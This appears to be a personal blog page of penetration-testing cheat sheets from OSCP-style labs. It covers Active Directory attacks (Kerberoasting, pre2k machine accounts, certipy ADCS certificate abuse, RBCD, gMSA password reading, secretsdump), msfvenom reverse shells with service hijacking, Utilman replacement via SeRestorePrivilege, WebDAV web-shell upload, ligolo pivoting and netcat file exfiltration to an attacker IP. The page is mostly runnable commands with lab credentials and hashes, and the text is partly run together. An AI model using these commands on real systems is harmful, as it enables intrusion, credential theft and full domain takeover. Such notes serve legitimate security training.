Posts
Cheat Sheets & Tips
Cheat Sheets & Tips
hashcat:
hashcat -m 13100 hash.txt /path/to/wordlist -r /usr/share/hashcat/rules/best64.rule
hashcat:
hashcat -m 18200 hash.txt /path/to/wordlist
krbtgt hash is required.
or get a shell using Psexec
nxc ldap retro.vl -u 'trainee' -p 'trainee' -M pre2k
When the machine name is BANKING$, then the default password is banking
change the password
impacket-changepasswd 'retro.vl/BANKING$@10.129.234.44' -newpass 'Password1!' -p rpc-samr
export KRB5CCNAME=/home/parallels/.nxc/modules/pre2k/ccache/banking.ccache
https://oscp.adot8.com/windows-privilege-escalation/whoami-priv/serestoreprivilege
Execute the tool
Use the CN for -gpo-id option.
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log
set up responder
use slinky moudle. Automatically make a lnk file and locate it in a writable share
It’s like a mimikatz that can be used remotely.
Admin priv accounts needed
Prepare vaild domain credentials
impacket-mssqlclient "oscp.exam/sql_svc":Dolphin1@10.10.202.148 -windows-auth
enable_xp_cmdshell
upload ./148/rev.exe c:\windows\temp\rev.exe
impacket-secretsdump NIX01/Administrator:'mdm0axd*EQM7xmq.krn'@10.129.101.210
Get domain information remotely.
Domain user account needed.
Automatically analyze the result of bloodhound and make a report for me.
neo4j, bloodhound must be running.
even browser access to
/.gitis forbidden, it may still dump the repository
When target web service using joomla
services : display running sc.exe servicesupload : upload a filedownload : download a filewhoami /groupservices command in case of evilwin-rm.msfvenom -p windows/x64/shell_reverse_tcp -f exe -o rev.exe LHOST=10.10.15.99 LPORT=4444sc.exe config VMTools binPath="C:\Users\svc-printer\Documents\rev.exe"sc.exe stop VMTools sc.exe start VMToolsor alternatively, in the step 3, execute nc.exe binary.
certipy-ad find -username 'BANKING$' -password 'Password1!' -dc-ip 10.129.2.242 -vulnerable -enable -stdout
certipy-ad account -u 'BANKING$' -p 'Password1!' -dc-ip '10.129.2.242' -user 'administrator' read
certipy-ad req -u 'BANKING$' -p 'Password1!' -dc-ip '10.129.2.242' -target 'DC.retro.vl' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500'
certipy-ad -debug req -u 'BANKING$@retro.vl' -p 'Password1!' -dc-ip '10.129.2.242' -target 'DC.retro.vl' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl' -sid 'S-1-5-21-2983547755-698260136-4283918172-500' -key-size 4096
certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.129.2.242'
impacket-psexec retro.vl/administrator@retro.vl -hashes :252fac7066d93dd009d4fd2cd0368389
Add DNS Name to the /etc/hosts file
Check which coerce tool is available (optional)
pfx file is created. Certipy auth with the pfx file.NTLM hash is displayed.
sudo -l
sudo -u username
psql -h 127.0.0.1 -d register_hetemit -U railsdev
When there is a writable file in the systemd directory.
change to root user, add payload and reboot so that the script can be run
uid=1001(user1) gid=1002(user1) groups=1002(user1), 6(disk)
disk group members have raw read / write access to block devices.
check the mount
debugfsuid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)
sudo hexedit $file
showmount -e 10.1.156.207
Collect usernames from web server or any other sources and make a user list.
Input the user list to make combination of potential usernames
The result can be used for asrep roasting
Active Directory cheatsheet
When an account has SeRestorePrivilege, it can be leveraged to achieve privilege escalation by overwriting protected system files.
Download the following script, which enables the privilege in the current session:
script file.
Execute the script and abuse the privilege to replace Utilman.exe with cmd.exe:
This works because SeRestorePrivilege allows bypassing file permissions when writing to system locations.
From a Linux machine, connect to the target using RDP:
On the login screen, click the Ease of Access button. Since Utilman.exe has been replaced, this will launch cmd.exe with SYSTEM privileges.
When a user has adGMSAPassword permission over a target account, it is possible to retrieve the managed password and derive usable credentials for authentication.
If your account has adGMSAPassword rights over a Group Managed Service Account (gMSA), you can extract its password material.
Use a tool such as gmsapasswordreader.exe to retrieve the password data.
Transfer the binary to the target machine (in this case, enox) and execute it:
With the extracted NTLM (RC4) hash, authenticate as the gMSA account:
The user l.livingstone has GenericAll permission on the domain computer RESOURCEDC$.
GenericAll grants full control over the object — including the ability to write to msDS-AllowedToActOnBehalfOfOtherIdentity. This makes Resource-Based Constrained Delegation (RBCD) abuse possible: we create a machine account we control, configure the target to trust it for delegation, then impersonate any user (including Administrator) to obtain a service ticket via S4U2Proxy.
impacket-addcomputer creates a new machine account in the domain. We authenticate as l.livingstone using her NTLM hash.
Using our GenericAll rights, write fake$ into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of RESOURCEDC$. This tells the target to trust fake$ for delegation.
Using impacket-getST, perform S4U2Self + S4U2Proxy as fake$ to obtain a CIFS ticket impersonating Administrator.
Set the KRB5CCNAME environment variable so Impacket tools pick up the saved ticket automatically.
Since we authenticate with Kerberos, the target’s hostname must resolve correctly. Add an entry to /etc/hosts if needed, then connect using the ticket.
WebDAV (Web Distributed Authoring and Versioning) is an HTTP extension that allows clients to perform remote file operations on a web server. When misconfigured, it can be a powerful attack surface — especially if it requires only basic credentials or has loose upload restrictions.
WebDAV typically requires credentials to interact with.
davtest tests which file types can be uploaded and executed on the target WebDAV server.
The output shows both .aspx and .asp are executable — meaning we can upload a web shell or reverse shell payload in either format.
Using msfvenom, generate an ASPX reverse shell:
Upload the payload using the directory that davtest created in step 1:
With a listener ready, browse to the uploaded file to execute it:
The reverse shell connects back to the attacker machine.
sudo ligolo-proxy -selfcert -laddr "0.0.0.0:7878"
interface_create --name "evil-cha"
interface_add_route --name evil-cha --route 10.10.11.0/24
./agent -connect 192.168.45.224:7878 -ignore-cert
session
tunnel_start --tun evil-cha
For local port forwarding. (3 machines case)
Make sure the tunnel has started
From ligolo-proxy add the port forwarding
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
Now the pivoting machine forwards inbound port (1234) to kali port (4444)
listener_listDynamic port forwarding (2 machines case)
ifcreate --name ligolo
interface_add_route --name ligolo --route 240.0.0.1/32
.\agent.exe -connect :7878 -ignore-cert
session
tunnel_start --tun ligolo
impacket-mssqlclient hack.smarter/alice.wonderland:'Password1!'@240.0.0.1 -windows-auth
set up SMB server on kali
impacket-smbserver test . -smb2support -user user -password 1234
Connect to the SMB from windows
net use Z: \\192.168.45.211\test /user:user 1234
file receiver
nc -lp 1234 > file.txt
file sender
nc -q 0 192.168.45.211 1234 < file.txt
file receiver
nc -lp 1234 > file.txt
file sender
nc.exe -w 1 192.168.45.211 1234 < file.txt
python3 -m http.server 80
.\http-server.exe --ip 10.10.202.147 --port 8888
After getting a reverse shell, we can stabilize it using commands below.
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermctrl+zstty raw -echo; fgstty rows 38 columns 116